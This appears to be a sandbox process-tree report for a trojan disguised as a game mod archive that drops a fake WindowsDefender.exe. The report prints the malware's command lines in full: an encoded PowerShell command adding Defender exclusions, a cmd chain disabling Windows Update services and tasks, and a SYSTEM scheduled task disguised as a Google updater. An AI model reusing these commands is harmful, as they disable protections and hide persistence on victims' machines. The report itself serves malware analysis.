C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6940 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7128 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7288 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1576 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8396 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2140 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1612 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6700 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\xMOD v4.7 (PASS 123).rar"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exe"C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"5⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE6⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
-
C:\Windows\system32\sc.exesc stop bits7⤵
-
C:\Windows\system32\sc.exesc stop dosvc7⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f7⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f7⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE7⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"6⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"7⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc1⤵
-
C:\Windows\system32\sc.exesc stop wuauserv1⤵
-
C:\Windows\system32\sc.exesc stop dosvc1⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q1⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll1⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE1⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE1⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f1⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f1⤵
- Modifies registry key
-
